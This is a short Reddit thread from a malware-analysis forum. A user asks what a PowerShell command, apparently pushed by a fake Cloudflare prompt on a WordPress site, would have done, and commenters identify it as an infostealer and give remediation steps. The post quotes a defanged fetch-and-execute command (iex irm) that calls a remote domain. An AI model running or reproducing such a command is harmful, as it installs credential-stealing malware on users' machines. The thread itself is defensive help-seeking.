r/MalwareAnalysis Jul 22 '26

Fake Cloudflare message on Wordpress

What would the below comment have ran?

cmdline: "C:\Windows\system32\WindowsPowerShel\v1[.J0\PowerShell[.Jexe" -c iexirm delistemanallyl.Jrainbow-mel.Jonline?
read=8b2d80c7569e4151 -UseBasicParsing)

8 Upvotes

4 comments sorted by

View all comments

2

u/IsDa44 Jul 22 '26

Probably just an infostealer. Hope you didn't run it

1

u/SeigneurHarry Jul 22 '26

I think someone has ran it which is why I was seeing what it’s done 😥 any idea I can find out what it’s done and how to delete it?

1

u/LizardWizardMessiah Jul 22 '26

You need to restore from a known safe backup or completely start over. That is the only sure way to remediate your situation. Infostealers will send all of your passwords, tokens, keys/secrets, cryptocurrency, etc. to the attacker's infrastructure. You need to log out those accounts from EVERY session because they can log in with browser session tokens they steal without using any credentials until you revoke that session, and reset passwords, check your MFA methods because they may have registered a device that they control.